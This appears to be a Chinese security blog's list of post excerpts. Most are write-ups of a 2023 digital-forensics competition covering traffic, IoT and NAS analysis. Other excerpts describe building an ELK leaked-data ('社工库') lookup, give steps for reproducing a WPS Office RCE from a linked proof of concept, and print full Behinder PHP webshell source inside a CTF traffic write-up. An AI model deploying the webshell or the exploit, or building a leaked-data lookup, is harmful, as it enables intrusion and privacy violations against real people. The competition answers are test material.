2023年首届盘古石杯全国电子数据取证大赛技能赛决赛(流量部分)
2023年首届盘古石杯全国电子数据取证大赛技能赛决赛(流量部分)1、计算流量包文件的SHA256值是?[答案:字母小写][★☆☆☆☆]
2、流量包长度在“640-1279”之间的的数据包总共有多少?[答案:100][★☆☆☆☆]陇剑杯考点,拿到手先解密
1(frame.len >= 640)&&(frame.len <= 1279)
或者
3、黑客使用的计算机操作系统是?[答案:windows7 x32][★★☆☆☆]做这类题我喜欢先把流量大致过一遍
12http and urlencoded-formhttp.response.code!=404 and data-text-lines
这样筛一遍,有特征最好,没有特征也问题不大
黑客的ip应该是192.168.100.141
计算机操作系统跟UA相关,随便追踪一个
4、黑客上传文件到哪个网盘?[答案:xx网盘][★★☆☆☆]
明显百度网盘,如果你会用科来的话直接一把梭了
5、黑客上传网盘的中间件是?[答案:xxxx][★★☆☆☆]了解一点linux加固的知识就知道,响应头里会暴露中间件的信息 ...
2023年首届盘古石杯全国电子数据取证大赛技能赛决赛(物联网部分)
1、分析扫地机器人数据,robot1.bin采用的压缩算法是?[答案格式:xxxx][★★☆☆☆☆]
LZMA算法
2、扫地机器人使用的软件版本是?[答案格式:0.0.0][★★☆☆☆☆]
3、扫地机器人id是?[答案格式:21243245838790][★★☆☆☆]
4、扫地机器人云证书的前6位是?[答案格式:sdfead][★★☆☆☆]
5、扫地机器人连接过的wifi的ssid是(channl1)?[答案格式:xx_xx_xx][★★☆☆☆]
6、扫地机器人连接过的wifi的密码是(channl1)?[答案格式:xxxx][★★☆☆☆]
7、扫地机器人的时区是?[答案格式:xx/xx][★★☆☆☆]
8、扫地机器人的名称是?[答案格式:xxxxx][★★☆☆☆]
9、无人机飞行纬度前两位是?[答案格式:xx][★★☆☆☆]
10、无人机的快门速度是?[答案格式:x/xxx][★★☆☆☆]
11、分析智能门锁数据包,请给出用户“wonderful”首次开门时间?[答案格式:2000-01-01 00:00-00:00][★★☆☆☆]
12、分析智能门锁数据包,请给 ...
2023年首届盘古石杯全国电子数据取证大赛技能赛决赛(服务器部分)
77.请分析服务器,给出NAS服务器系统账号密码?[答案格式:xx@xx][★★★☆☆☆]
78.请分析服务器,给出NAS服务器的版本信息?[答案格式:xx-xx-xx][★★☆☆☆☆]配个网先,仅主机模式
79.请分析服务器,给出NAS服务器内用户SMB的邮箱?[答案格式:xx@xx][★★☆☆☆☆]
80.请分析服务器,给出NAS服务器系统告警服务使用的邮箱?[答案格式:xx@xx][★★☆☆☆☆]
81.请分析服务器,给出NAS服务器内存储池名?[答案格式:xxx][★★☆☆☆]
82.请分析服务器,给出NAS服务器内有几个数据集和几个Zvol?[答案格式:0,0][★★★☆☆]
依次类推,答案为2,3
83.请分析服务器,给出该NAS服务器存储监听IP和端口?[答案格式:192.168.1.1:8080][★★★☆☆]
84.请分析服务器,给出NAS服务器内iSCSI目标为web的连接所使用的启动器组ID?[答案格式:xx][★★★☆☆]
85.请分析服务器,给出web服务器连接NAS服务器所使用的iqn?[答案格式:iqn.xxx][★★★☆☆]
86.请分析服务器 ...
ELK搭建社工库
ELK=Elasticsearch+Logstash+Kibana
ELK是一款主流的日志平台架构,分布式,毫秒级响应的特性适用于大量数据的筛查,支持api接口访问
内存:推荐配置:64G 可用配置:32G、16G 配置下限:8G
CPU:双核到8核都可以 核数优先于单核的处理能力。
硬盘:源文件约2.5倍的空间
1下载地址:https://www.elastic.co/cn/downloads(推荐低版本安装)
前置准备123456wget https://artifacts.elastic.co/downloads/elasticsearch/elasticsearch-7.7.0-x86_64.rpmwget https://artifacts.elastic.co/downloads/kibana/kibana-7.7.0-x86_64.rpmwget https://artifacts.elastic.co/downloads/logstash/logstash-7.7.0.rpmwget https://repo.huaweicloud.com/java/jd ...
金山WPS_RCE复现(0day)
wps影响范围为:WPS Office 2023 个人版 < 11.1.0.15120
WPS Office 2019 企业版 < 11.8.2.12085
1链接: https://pan.baidu.com/s/1TgXFkq1jvgVP6CIzIJbsaA?pwd=jmc1 提取码: jmc1 复制这段内容后打开百度网盘手机App,操作更方便哦
安装wps,版本为12300
更改hosts
1127.0.0.1 clientweb.docer.wps.cn.cloudwps.cn
在poc目录下运行监听服务
打开poc.html
成功复现
2023数字中国·数据安全产业人才能力挑战赛初赛_Beyond
思路题目就很明显了,是分析冰蝎流量,我做冰蝎有两种思路
1、找上传的冰蝎马,直接发现key
2、爆破返回包得到key(最无脑且有效的方法)
v4.0的马
123456789101112131415<?php@error_reporting(0); function decrypt($data){ $key="25f9e794323b4538"; $bs="base64_"."decode"; $after=$bs($data.""); for($i=0;$i<strlen($after);$i++) { $after[$i] = $after[$i]^$key[$i+1&15]; } return $after;} $post=Decrypt(file_get_contents("php://input")); eval($post);?>
v3.0 ...